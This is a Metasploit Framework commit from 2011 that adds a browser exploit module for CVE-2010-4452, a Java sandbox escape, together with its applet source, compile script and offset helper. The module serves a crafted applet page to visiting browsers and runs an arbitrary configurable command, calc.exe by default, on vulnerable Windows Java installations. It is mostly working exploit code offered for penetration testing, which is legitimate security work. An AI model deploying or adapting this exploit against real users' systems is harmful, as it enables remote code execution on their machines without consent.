add exploit for cve-2010-4452, currently windows only and no payloads :(

git-svn-id: file:///home/svn/framework3/trunk@11982 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-16 04:50:25 +00:00 · 2011-03-16 04:50:25 +00:00 · 4644110962
parent ebb41c327e
commit 4644110962
5 changed files with 183 additions and 0 deletions
--- a/data/exploits/cve-2010-4452/AppletX.class
+++ b/data/exploits/cve-2010-4452/AppletX.class
--- a/external/source/exploits/cve-2010-4452/AppletX.java
+++ b/external/source/exploits/cve-2010-4452/AppletX.java
@ -0,0 +1,23 @@
+
+public class AppletX extends java.applet.Applet
+{
+   public void init()
+     {
+	Process p = null;
+	System.out.println( "Executing" );
+	
+	try
+	  {
+	     p = Runtime.getRuntime().exec( "calc.exe" );
+	     if( p == null )
+	       {
+		  System.out.println( "Null process, crap" );
+	       }
+	     p.waitFor();
+	  }
+	catch( Exception e ) 
+	  {
+	     System.out.println(e);
+	  }
+     }
+}
--- a/external/source/exploits/cve-2010-4452/compile.sh
+++ b/external/source/exploits/cve-2010-4452/compile.sh
@ -0,0 +1,7 @@
+#!/bin/sh
+
+javac -target 1.5 -source 1.5 AppletX.java
+#javac AppletX.java
+./get_offsets.rb AppletX.class
+mv AppletX.class ../../../../data/exploits/cve-2010-4452/
+rm -f AppletX.class
--- a/external/source/exploits/cve-2010-4452/get_offsets.rb
+++ b/external/source/exploits/cve-2010-4452/get_offsets.rb
@ -0,0 +1,7 @@
+#!/usr/bin/env ruby
+
+dat = File.open(ARGV[0], 'rb') { |fd| fd.read }
+
+puts "cmd_off = 0x%x" % dat.index("\x00\x08calc.exe")
+puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX")
+
--- a/modules/exploits/windows/browser/java_codebase_trust.rb
+++ b/modules/exploits/windows/browser/java_codebase_trust.rb
@ -0,0 +1,146 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize( info = {} )
+		super( update_info( info,
+			'Name'          => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',
+			'Description'   => %q{
+					This module exploits a vulnerability in Java Runtime Environment
+				that allows an attacker to escape the Java Sandbox. By supplying a 
+				codebase that points at a trusted directory and a code that is a URL that
+				does not contain an dots an applet can run without the sandbox.
+
+				The vulnerability affects version 6 prior to update 24.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        => [
+					'Frederic Hoguin', # Discovery, PoC
+					'jduck'            # Metasploit module
+				],
+			'Version'       => '$Revision$',
+			'References'    =>
+				[
+					[ 'CVE', '2010-4452' ],
+					# [ 'OSVDB', '' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],
+					[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],
+					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]
+				],
+			'Platform'      => [ 'java', 'win' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23
+					# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23
+					[ 'Automatic (no payload)', { } ]
+=begin
+					[ 'Windows x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win',
+						}
+					],
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+							'Platform' => 'java',
+						}
+					],
+=end
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Feb 15 2011'
+			))
+	
+		register_options(
+			[
+				OptString.new('CMD', [ false,  "Command to run.", "calc.exe"]),
+				OptString.new('LIBPATH', [ false,  "The codebase path to use (privileged)",
+					"C:\\Program Files\\java\\jre6\\lib\\ext"]),
+			], self.class)
+	end
+
+	def exploit
+		path = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ].join(::File::SEPARATOR)
+		@java_class = nil
+		File.open(path, "rb") { |fd|
+			@java_class = fd.read(fd.stat.size)
+		}
+		if not @java_class
+			raise RuntimeError, "Unable to load java class"
+		end
+
+		super
+	end
+
+	def on_request_uri(cli, request)
+		#print_status("Received request: #{request.uri}")
+
+		jpath = get_uri(cli)
+		#print_status(jpath)
+
+		# Do what get_uri does so that we can replace it in the string
+		host = Rex::Socket.source_address(cli.peerhost)
+		host_num = Rex::Socket.addr_aton(host).unpack('N').first
+		host_num = 'lfear'
+
+		codebase = "file:" + datastore['LIBPATH']
+		code_url = jpath.sub(host, host_num.to_s)
+
+		cmd = datastore['CMD']
+		cmd_off = 0xb4
+
+		cn_off = 0xfc
+
+		case request.uri
+
+		when /\.class$/
+			#p = regenerate_payload(cli)
+
+			print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")
+
+			cls = @java_class.dup
+			cls[cmd_off,2] = [cmd.length].pack('n')
+			cls[cmd_off+2,8] = cmd
+
+			cn_off += (cmd.length - 8)  # the original length was 8 (calc.exe)
+			cls[cn_off,2] = [code_url.length].pack('n')
+			cls[cn_off+2,7] = code_url
+
+			#File.open('ughz.class', 'wb') { |fd| fd.write cls }
+
+			send_response(cli, cls, { 'Content-Type' => "application/octet-stream" })
+			handler(cli)
+
+		else
+			html = <<-EOS
+<html>
+<body>
+<applet codebase="#{codebase}" code="#{code_url}" />
+</body>
+</html>
+EOS
+			print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")
+			send_response_html(cli, html)
+			handler(cli)
+		end
+
+	end
+
+end